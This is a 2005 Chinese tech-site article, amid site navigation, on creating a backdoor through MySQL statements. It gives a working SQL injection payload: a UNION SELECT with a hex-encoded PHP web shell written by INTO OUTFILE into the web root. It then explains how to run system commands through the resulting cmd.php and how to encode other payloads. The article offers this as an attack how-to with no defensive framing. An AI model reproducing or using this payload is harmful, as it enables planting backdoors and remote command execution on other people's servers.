首 页 | 精品电影 | 音乐天堂 | 在线游戏 | Flash MTV | 三湘书屋 | 幽默笑话 | 三湘图库 | 美女写真 | IT知识库 | QQ贴图 | 加入书签

网页制作网络编程图形图象操作系统冲浪宝典软件教学网络安全认证考试通信技术电子商务业内动态书籍教程原码

最近更新 文章分类 多媒体类 精品软件

本站搜索:
您的位置:三湘时空 -> IT知识库 -> 文章分类 -> 数据库安全 -> 通过Mysql的语句生成后门木马的方法  
通过Mysql的语句生成后门木马的方法


文章类别:数据库安全 来源: 作者: 发表日期:2005-10-4 字体:[ ]

小游戏 | 在线影院 | 幽默笑话 | 源码下载 | Flash MTV | 音乐试听 | 书屋 | 美女写真

通过Mysql 的语句生成后门木马的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

上一篇:asp.net中执行存储数据操作时数据被自动截取的一种情况 下一篇:令你的网站获得任意Google PR值的方法
本栏目热门文章
·MSSQL db_owner角色注入直接获得系统权限 2005-10-4
·SQL注入攻击的原理及其防范措施 2005-10-4
·突破一流信息监控拦截系统进行SQL注射 2005-10-6
·数据库下载漏洞攻击技术 2005-10-4
·防范SQL注入式攻击 2005-10-4
·数据库安全性策略 (2) 2005-10-4
·SQL Server应用程序中的高级SQL注入 2005-10-4
·Mssql和Mysql的安全性分析 2005-10-4
·有孔就入 SQL Injection的深入探讨 2005-10-4
·通过Mysql的语句生成后门木马的方法 2005-10-4
新近更新文章
·安防有道:实施自动的SQL注入攻击测试 2006-4-16
·攻防实战:注水漏洞的利用和防范 2006-4-5
·突破一流信息监控拦截系统进行SQL注射 2005-10-6
·保护SQL Server 2000的十个步骤 2005-10-4
·数据库下载漏洞攻击技术 2005-10-4
·通过Mysql的语句生成后门木马的方法 2005-10-4
·小议MSSQL Server 2000的安全及管理 2005-10-4
·SQL Server应用程序中的高级SQL注入 2005-10-4
·SQL注入攻击的原理及其防范措施 2005-10-4
·SQL注入不完全思路与防注入程序 2005-10-4
首 页 | 软件发布 | 广告联系 | 下载帮助 | 意见反馈 | 网站地图
  CopyRight? 2002-2004 WWW.SXSKY.NET? All Rights Reserved
三湘时空 站长QQ:82675303 Email: